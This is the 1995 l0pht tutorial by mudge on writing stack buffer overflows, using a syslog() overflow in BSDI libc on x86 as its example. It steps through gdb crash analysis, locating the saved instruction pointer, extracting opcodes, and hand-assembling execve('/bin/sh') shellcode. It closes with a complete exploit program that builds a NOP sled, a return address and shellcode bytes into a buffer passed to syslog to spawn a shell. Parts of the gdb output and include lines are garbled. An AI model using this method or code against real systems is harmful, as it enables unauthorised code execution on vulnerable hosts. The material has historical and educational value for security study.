l0pht advisories

How to write Buffer Overflows


This is really rough, and some of it is not needed. I wrote this as a reminder note to myself as I really didn't want to look at any more AT&T assembly again for a while and was afraid I would forget what I had done. If you are an old assembly guru then you might scoff at some of this... oh well, it works and that's a hack in itself.

-by mudge@l0pht.com 10/20/95

test out the program (duh).
--------syslog_test_1.c------------

#include 

char buffer[4028];

void main() {

   int i;

   for (i=0; i<=4028; i++)
       buffer[i]='A';

   syslog(LOG_ERR, buffer);
}

--------end syslog_test_1.c----------
Compile the program and run it. Make sure you include the symbol table for the debugger or not... depending upon how macho you feel today.

bash$ gcc -g buf.c -o buf
bash$ buf
Segmentation fault (core dumped)

The 'Segmentation fault (core dumped)' is what we wanted to see. This tells us there is definately an attempt to access some memory address that we shouldn't. If you do much in 'C' with pointers on a unix machine you have probably seen this (or Bus error) when pointing or dereferencing incorrectly.

Fire up gdb on the program (with or without the core file). Assuming you remove the core file (this way you can learn a bit about gdb), the steps would be as follows:

   bash$ gdb buf
   (gdb) run
   Starting program: /usr2/home/syslog/buf 

   Program received signal 11, Segmentation fault
   0x1273 in vsyslog (0x41414141, 0x41414141, 0x41414141, 0x41414141)

Ok, this is good. The 41's you see are the hex equivallent for the ascii character 'A'. We are definately going places where we shouldn't be.

   (gdb) info all-registers
   eax            0xefbfd641       -272640447
   ecx            0x00000000       0
   edx            0xefbfd67c       -272640388
   ebx            0xefbfe000       -272637952
   esp            0xefbfd238       0xefbfd238
   ebp            0xefbfde68       0xefbfde68
   esi            0xefbfd684       -272640380
   edi            0x0000cce8       52456
   eip            0x00001273       0x1273
   ps             0x00010212       66066
   cs             0x0000001f       31
   ss             0x00000027       39
   ds             0x00000027       39
   es             0x00000027       39
   fs             0x00000027       39
   gs             0x00000027       39

The gdb command 'info all-registers' shows the values in the current hardware registers. The one we are really interested in is 'eip'. On some platforms this will be called 'ip' or 'pc'. It is the Instruction Pointer [also called Program Counter]. It points to the memory location of the next instruction the processor will execute. By overwriting this you can point to the beginning of your own code and the processor will merrily start executing it assuming you have it written as native opcodes and operands.

In the above we haven't gotten exactly where we need to be yet. If you want to see where it crashed out do the following:

(gdb) disassemble 0x1273
   [stuff deleted]
   0x1267 :   incl   0xfffff3dc(%ebp)
   0x126d :   testb  %al,%al
   0x126f :   jne    0x125c 
   0x1271 :   jmp    0x1276 
   0x1273 :   movb   %al,(%ebx)
   0x1275 :   incl   %ebx
   0x1276 :   incl   %edi
   0x1277 :   movb   (%edi),%al
   0x1279 :   testb  %al,%al

If you are familiar with microsoft assembler this will be a bit backwards to you. For example: in microsoft you would 'mov ax,cx' to move cx to ax. In AT&T 'mov ax,cx' moves ax to cx. So put on those warp refraction eye-goggles and on we go.

Note also that Intel assembler

let's go back and tweak the original source code some eh?

-------------syslog_test_2.c-------------

#include 

char buffer[4028];

void main() {

   int i;

   for (i=0; i<2024; i++)
       buffer[i]='A';

   syslog(LOG_ERR, buffer);
}

-----------end syslog_test_2.c-------------
We're just shortening the length of 'A''s.

   bash$ gcc -g buf.c -o buf
   bash$ gdb buf
   (gdb) run
   Starting program: /usr2/home/syslog/buf 

   Program received signal 5, Trace/BPT trap
   0x1001 in ?? (Error accessing memory address 0x41414149: Cannot 
	allocate memory.

This is the magic response we've been looking for.

   (gdb) info all-registers 
   eax            0xffffffff       -1
   ecx            0x00000000       0
   edx            0x00000008       8
   ebx            0xefbfdeb4       -272638284
   esp            0xefbfde70       0xefbfde70
   ebp            0x41414141       0x41414141   <- here it is!!!
   esi            0xefbfdec0       -272638272
   edi            0xefbfdeb8       -272638280
   eip            0x00001001       0x1001
   ps             0x00000246       582
   cs             0x0000001f       31
   ss             0x00000027       39
   ds             0x00000027       39
   es             0x00000027       39
   fs             0x00000027       39
   gs             0x00000027       39


Now we move it along until we figure out where eip lives in the overflow (which is right after ebp in this arch architecture). With that known fact we only have to add 4 more bytes to our buffer of 'A''s and we will overwrite eip completely.
---------syslog_test_3.c----------------

#include 

char buffer[4028];

void main() {

   int i;

   for (i=0; i<2028; i++)
       buffer[i]='A';

   syslog(LOG_ERR, buffer);
}
-------end syslog_test_3.c------------

   bash$ !gc
   gcc -g buf.c -o buf
   bash$ gdb buf
   (gdb) run
   Starting program: /usr2/home/syslog/buf 

   Program received signal 11, Segmentation fault
   0x41414141 in errno (Error accessing memory address 
                    0x41414149: Cannot allocate memory.


   (gdb) info all-registers 
   eax            0xffffffff       -1
   ecx            0x00000000       0
   edx            0x00000008       8
   ebx            0xefbfdeb4       -272638284
   esp            0xefbfde70       0xefbfde70
   ebp            0x41414141       0x41414141
   esi            0xefbfdec0       -272638272
   edi            0xefbfdeb8       -272638280
   eip            0x41414141       0x41414141
   ps             0x00010246       66118
   cs             0x0000001f       31
   ss             0x00000027       39
   ds             0x00000027       39
   es             0x00000027       39
   fs             0x00000027       39
   gs             0x00000027       39

BINGO!!!

Here's where it starts to get interesting. Now that we know eip starts at buffer[2024] and goes through buffer[2027] we can load it up with whatever we need. The question is... what do we need?

We find this by looking at the contents of buffer[].

   (gdb) disassemble buffer
   [stuff deleted]
   0xc738 :   incl   %ecx
   0xc739 :   incl   %ecx
   0xc73a :   incl   %ecx
   0xc73b :   incl   %ecx
   0xc73c :   addb   %al,(%eax)
   0xc73e :   addb   %al,(%eax)
   0xc740 :   addb   %al,(%eax)
   [stuff deleted]

On the Intel x86 architecture [a pentium here but that doesn't matter] incl %eax is opcode 0100 0001 or 41hex. addb %al,(%eax) is 0000 0000 or 0x0 hex. We will load up buffer[2024] to buffer[2027] with the address of 0xc73c where we will start our code. You have two options here, one is to load the buffer up with the opcodes and operands and point the eip back into the buffer; the other option is what we are going to be doing which is to put the opcodes and operands after the eip and point to them.

The advantage to putting the code inside the buffer is that other than the ebp and eip registers you don't clobber anything else. The disadvantage is that you will need to do trickier coding (and actually write the assembly yourself) so that there are no bytes that contain 0x0 which will look like a null in the string. This will require you to know enough about the native chip architecture and opcodes to do this [easy enough for some people on Intel x86's but what happens when you run into an Alpha? -- lucky for us there is a gdb for Alpha I think ;-)].

The advantage to putting the code after the eip is that you don't have to worry about bytes containing 0x0 in them. This way you can write whatever program you want to execute in 'C' and have gdb generate most of the machine code for you. The disadvantage is that you are overwriting the great unknown. In most cases the section you start to overwrite here contains your environment variables and other whatnots.... upon succesfully running your created code you might be dropped back into a big void. Deal with it.

The safest instruction is NOP which is a benign no-operation. This is what you will probably be loading the buffer up with as filler.

Ahhh but what if you don't know what the opcodes are for the particular architecture you are on. No problem. gcc has a wonderfull function called __asm__(char *); I rely upon this heavily for doing buffer overflows on architectures that I don't have assembler books for.

------nop.c--------
void main(){

__asm__("nop\n");

}
----end nop.c------

   bash$ gcc -g nop.c -o nop
   bash$ gdb nop
   (gdb) disassemble main
   Dump of assembler code for function main:
   to 0x1088:
   0x1080 
: pushl %ebp 0x1081 : movl %esp,%ebp 0x1083 : nop 0x1084 : leave 0x1085 : ret 0x1086 : addb %al,(%eax) End of assembler dump. (gdb) x/bx 0x1083 0x1083 : 0x90
Since nop is at 0x1083 and the next instruction is at 0x1084 we know that nop only takes up one byte. Examining that byte shows us that it is 0x90 (hex).

Our program now looks like this:
------ syslog_test_4.c---------

#include 

char buffer[4028];

void main() {

   int i;

   for (i=0; i<2024; i++)
       buffer[i]=0x90;

   i=2024;

   buffer[i++]=0x3c;
   buffer[i++]=0xc7;
   buffer[i++]=0x00;
   buffer[i++]=0x00;


   syslog(LOG_ERR, buffer);
}
------end syslog_test_4.c-------

Notice you need to load the eip backwards ie 0000c73c is loaded into the buffer as 3c c7 00 00.

Now the question we have is what is the code we insert from here on?

Suppose we want to run /bin/sh? Gee, I don't have a friggin clue as to why someone would want to do something like this, but I hear there are a lot of nasty people out there. Oh well. Here's the proggie we want to execute in C code:

------execute.c--------
#include 
main()
{
   char *name[2];
   name[0] = "sh";
   name[1] = NULL;
   execve("/bin/sh",name,NULL);
}  
----end execute.c-------

   bash$ gcc -g execute.c -o execute
   bash$ execute
   $ 
 
Ok, the program works. Then again, if you couldn't whip up that little prog you should probably throw in the towel here. Maybe become a webmaster or something that requires little to no programming (or brainwave activity period). Here's the gdb scoop:

   bash$ gdb execute
   (gdb) disassemble main
   Dump of assembler code for function main:
   to 0x10b8:
   0x1088 
: pushl %ebp 0x1089 : movl %esp,%ebp 0x108b : subl $0x8,%esp 0x108e : movl $0x1080,0xfffffff8(%ebp) 0x1095 : movl $0x0,0xfffffffc(%ebp) 0x109c : pushl $0x0 0x109e : leal 0xfffffff8(%ebp),%eax 0x10a1 : pushl %eax 0x10a2 : pushl $0x1083 0x10a7 : call 0x10b8 0x10ac : leave 0x10ad : ret 0x10ae : addb %al,(%eax) 0x10b0 : jmp 0x1140 0x10b5 : addb %al,(%eax) 0x10b7 : addb %cl,0x3b05(%ebp) End of assembler dump. (gdb) disassemble execve Dump of assembler code for function execve: to 0x10c8: 0x10b8 : leal 0x3b,%eax 0x10be : lcall 0x7,0x0 0x10c5 : jb 0x10b0 0x10c7 : ret End of assembler dump.
This is the assembly behind what our execute program does to run /bin/sh. We use execve() as it is a system call and this is what we are going to have our program execute (ie let the kernel service run it as opposed to having to write it from scratch).

0x1083 contains the /bin/sh string and is the last thing pushed onto the stack before the call to execve.

   (gdb) x/10bc 0x1083
   0x1083 :  47 '/'  98 'b'  105 'i'  110 'n'  47 '/'  115 's'  
                       104 'h'  0 '\000'

(0x1080 contains the arguments...which I haven't been able to really clean up).

We will replace this address with the one where our string lives [when we decide where that will be].

Here's the skeleton we will use from the execve disassembly:

[main]
   0x108d :        movl   %esp,%ebp

   0x108e :        movl   $0x1083,0xfffffff8(%ebp)
   0x1095 :       movl   $0x0,0xfffffffc(%ebp)
   0x109c :       pushl  $0x0
   0x109e :       leal   0xfffffff8(%ebp),%eax
   0x10a1 :       pushl  %eax
   0x10a2 :       pushl  $0x1080

[execve]
   0x10b8 :        leal   0x3b,%eax
   0x10be :      lcall  0x7,0x0

All you need to do from here is to build up a bit of an environment for the program. Some of this stuff isn't necesary but I have it in still as I haven't fine tuned this yet.

I clean up eax. I don't remember why I do this and it shouldn't really be necesarry. Hell, better quit hitting the sauce. I'll figure out if it is after I tune this up a bit.

   xorl   %eax,%eax

We will encapsulate the actuall program with a jmp to somewhere and a call right back to the instruction after the jmp. This pushes ecx and esi onto the stack.

   jmp    0x????  # this will jump to the call...
   popl   %esi
   popl   %ecx

The call back will be something like:
   call   0x????  # this will point to the instruction after the jmp (ie
		  # popl %esi)

All put together it looks like this now:

----------------------------------------------------------------------
   movl   %esp,%ebp   
   xorl   %eax,%eax
   jmp    0x????  # we don't know where yet...
# -------------[main]
   movl   $0x????,0xfffffff8(%ebp)  # we don't know what the address will
				    # be yet.
   movl   $0x0,0xfffffffc(%ebp)
   pushl  $0x0
   leal   0xfffffff8(%ebp),%eax
   pushl  %eax
   pushl  $0x????		    # we don't know what the address will
				    # be yet.
# ------------[execve]
   leal   0x3b,%eax
   lcall  0x7,0x0

   call   0x????  # we don't know where yet...

----------------------------------------------------------------------

There are only a couple of more things that we need to add before we fill in the addresses to a couple of the instructions.

Since we aren't actually calling execve with a 'call' anymore here, we need to push the value in ecx onto the stack to simulate it.
# ------------[execve]
   pushl  %ecx
   leal   0x3b,%eax
   lcall  0x7,0x0

The only other thing is to not pass in the arguments to /bin/sh. We do this by changing the ' leal 0xfffffff8(%ebp),%eax' to ' leal 0xfffffffc(%ebp),%eax' [remember 0x0 was moved there].

So the whole thing looks like this (without knowing the addresses for the '/bin/sh\0' string):

   movl   %esp,%ebp 
   xorl   %eax,%eax # we added this
   jmp    0x????    # we added this
   popl   %esi      # we added this
   popl   %ecx      # we added this
   movl   $0x????,0xfffffff5(%ebp)
   movl   $0x0,0xfffffffc(%ebp)
   pushl  $0x0
   leal   0xfffffffc(%ebp),%eax  # we changed this
   pushl  %eax
   pushl  $0x????
   leal   0x3b,%eax
   pushl  %ecx       # we added this
   lcall  0x7,0x0
   call   0x????     # we added this

To figure out the bytes to load up our buffer with for the parts that were already there run gdb on the execute program.

   bash$ gdb execute
   (gdb) disassemble main
   Dump of assembler code for function main:
   to 0x10bc:
   0x108c 
: pushl %ebp 0x108d : movl %esp,%ebp 0x108f : subl $0x8,%esp 0x1092 : movl $0x1080,0xfffffff8(%ebp) 0x1099 : movl $0x0,0xfffffffc(%ebp) 0x10a0 : pushl $0x0 0x10a2 : leal 0xfffffff8(%ebp),%eax 0x10a5 : pushl %eax 0x10a6 : pushl $0x1083 0x10ab : call 0x10bc 0x10b0 : leave 0x10b1 : ret 0x10b2 : addb %al,(%eax) 0x10b4 : jmp 0x1144 0x10b9 : addb %al,(%eax) 0x10bb : addb %cl,0x3b05(%ebp) End of assembler dump. [get out your scratch paper for this one... ] 0x108d : movl %esp,%ebp this goes from 0x108d to 0x108e. 0x108f starts the next instruction. thus we can see the machine code with gdb like this. (gdb) x/2bx 0x108d 0x108d : 0x89 0xe5
Now we know that buffer[2028]=0x89 and buffer[2029]=0xe5. Do this for all of the instructions that we are pulling out of the execute program. You can figure out the basic structure for the call command by looking at the one inexecute that calls execve. Of course you will eventually need to put in the proper address.

When I work this out I break down the whole program so I can see what's going on. Something like the following

   0x108c 
: pushl %ebp 0x108d : movl %esp,%ebp 0x108f : subl $0x8,%esp (gdb) x/bx 0x108c 0x108c
: 0x55 (gdb) x/bx 0x108d 0x108d : 0x89 (gdb) x/bx 0x108e 0x108e : 0xe5 (gdb) x/bx 0x108e 0x108f : 0x83 so we see the following from this: 0x55 pushl %ebp 0x89 movl %esp,%ebp 0xe5 0x83 subl $0x8,%esp etc. etc. etc.
For commands that you don't know the opcodes to you can find them out for the particular chip you are on by writing little scratch programs.
----pop.c-------
void main() {

__asm__("popl %esi\n");

}
---end pop.c----

   bash$ gcc -g pop.c -o pop
   bash$ gdb pop
   (gdb) disassemble main 
   Dump of assembler code for function main:
   to 0x1088:
   0x1080 
: pushl %ebp 0x1081 : movl %esp,%ebp 0x1083 : popl %esi 0x1084 : leave 0x1085 : ret 0x1086 : addb %al,(%eax) End of assembler dump. (gdb) x/bx 0x1083 0x1083 : 0x5e
So, 0x5e is popl %esi. You get the idea. After you have gotten this far build the string up (put in bogus addresses for the ones you don't know in the jmp's and call's... just so long as we have the right amount of space being taken up by the jmp and call instructions... likewise for the movl's where we will need to know the memory location of 'sh\0\0/bin/sh\0'.

After you have built up the string, tack on the chars for sh\0\0/bin/sh\0.

Compile the program and load it into gdb. Before you run it in gdb set a break point for the syslog call.

   (gdb) break syslog
   Breakpoint 1 at 0x1463
   (gdb) run
   Starting program: /usr2/home/syslog/buf

   Breakpoint 1, 0x1463 in syslog (0x00000003, 0x0000bf50, 0x0000082c, 
			0xefbfdeac)
   (gdb) disassemble 0xc73c 0xc77f   
        (we know it will start at 0xc73c since thats right after the
	 eip overflow... 0xc77f is just an educated guess as to where
         it will end)

   (gdb) disassemble 0xc73c 0xc77f
   Dump of assembler code from 0xc73c to 0xc77f:
   0xc73c :   movl   %esp,%ebp
   0xc73e :   xorl   %eax,%eax
   0xc740 :   jmp    0xc76b 
   0xc742 :   popl   %esi
   0xc743 :   popl   %ecx
   0xc744 :   movl   $0xc770,0xfffffff5(%ebp)
   0xc74b :   movl   $0x0,0xfffffffc(%ebp)
   0xc752 :   pushl  $0x0
   0xc754 :   leal   0xfffffffc(%ebp),%eax
   0xc757 :   pushl  %eax
   0xc758 :   pushl  $0xc773
   0xc75d :   leal   0x3b,%eax
   0xc763 :   pushl  %ecx
   0xc764 :   lcall  0x7,0x0
   0xc76b :   call   0xc742 
   0xc770 :   jae    0xc7da 
   0xc772 :   addb   %ch,(%edi)
   0xc774 :   boundl 0x6e(%ecx),%ebp
   0xc777 :   das    
   0xc778 :   jae    0xc7e2 
   0xc77a :   addb   %al,(%eax)
   0xc77c :   addb   %al,(%eax)
   0xc77e :   addb   %al,(%eax)
   End of assembler dump.

Look for the last instruction in your code. In this case it was the 'call' to right after the 'jmp' near the beginning. Our data should be right after it and indeed we see that it is.

   (gdb) x/13bc 0xc770
   0xc770 :  115 's'  104 'h'  0 '\000'  47 '/'  
			  98 'b'  105 'i'  110 'n'  47 '/'
   0xc778 :  115 's'  104 'h'  0 '\000'  0 '\000'  0 '\000'

Now go back into your code and put the appropriate addresses in the movl and pushl. At this point you should also be able to put in the appropriate operands for the jmp and call. Congrats... you are done. Here's what the output will look like when you run this on a system with the non patched libc/syslog bug.

   bash$ buf
   $ exit (do whatever here... you spawned a shell!!!!!! yay!)
   bash$ 

Here's my original program with lot's of comments:

/*****************************************************************/
/* For BSDI running on Intel architecture -mudge, 10/19/95       */
/* by following the above document you should be able to write   */
/* buffer overflows for other OS's on other architectures now    */
/* mudge@l0pht.com                                               */
/*                                                               */
/* note: I haven't cleaned this up yet... it could be much nicer */
/*****************************************************************/

#include 

char buffer[4028];

void main () {

   int i;

  for(i=0; i<2024; i++)
    buffer[i]=0x90;


  /* should set eip to 0xc73c */

    buffer[2024]=0x3c;
    buffer[2025]=0xc7; 
    buffer[2026]=0x00; 
    buffer[2027]=0x00; 

  i=2028;

/* begin actuall program */


    buffer[i++]=0x89; /* movl %esp, %ebp */
    buffer[i++]=0xe5;

    buffer[i++]=0x33; /* xorl %eax,%eax */
    buffer[i++]=0xc0;

    buffer[i++]=0xeb; /* jmp ahead  */
    buffer[i++]=0x29;

    buffer[i++]=0x5e; /* popl %esi       */

    buffer[i++]=0x59; /* popl %ecx        */

    buffer[i++]=0xc7; /* movl $0xc770,0xfffffff8(%ebp) */
    buffer[i++]=0x45;
    buffer[i++]=0xf5;
    buffer[i++]=0x70;
    buffer[i++]=0xc7;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0xc7; /* movl $0x0,0xfffffffc(%ebp) */
    buffer[i++]=0x45;
    buffer[i++]=0xfc;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x6a; /* pushl $0x0 */
    buffer[i++]=0x00;

#ifdef z_out
    buffer[i++]=0x8d; /* leal 0xfffffff8(%ebp),%eax */
    buffer[i++]=0x45;
    buffer[i++]=0xf8;
#endif

/* the above is what the disassembly of execute does... but we only
   want to push /bin/sh to be executed... it looks like this leal
   puts into eax the address where the arguments are going to be
   passed. By pointing to 0xfffffffc(%ebp) we point to a null 
   and don't care about the args... could probably just load up
   the first section movl $0x0,0xfffffff8(%ebp) with a null and
   left this part the way it want's to be */

    buffer[i++]=0x8d; /* leal 0xfffffffc(%ebp),%eax */
    buffer[i++]=0x45; 
    buffer[i++]=0xfc;


    buffer[i++]=0x50; /* pushl %eax */

    buffer[i++]=0x68; /* pushl $0xc773 */
    buffer[i++]=0x73;
    buffer[i++]=0xc7;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x8d; /* lea 0x3b,%eax */
    buffer[i++]=0x05;
    buffer[i++]=0x3b;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    buffer[i++]=0x51; /* pushl %ecx */

    buffer[i++]=0x9a; /* lcall 0x7,0x0 */
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x00;
    buffer[i++]=0x07;
    buffer[i++]=0x00;

    buffer[i++]=0xe8; /* call back to ??? */
    buffer[i++]=0xd2; 
    buffer[i++]=0xff;
    buffer[i++]=0xff;
    buffer[i++]=0xff;

    buffer[i++]='s';
    buffer[i++]='h';
    buffer[i++]=0x00;
    buffer[i++]='/';
    buffer[i++]='b';
    buffer[i++]='i';
    buffer[i++]='n';
    buffer[i++]='/';
    buffer[i++]='s';
    buffer[i++]='h';
    buffer[i++]=0x00;
    buffer[i++]=0x00;

    syslog(LOG_ERR, buffer);
}


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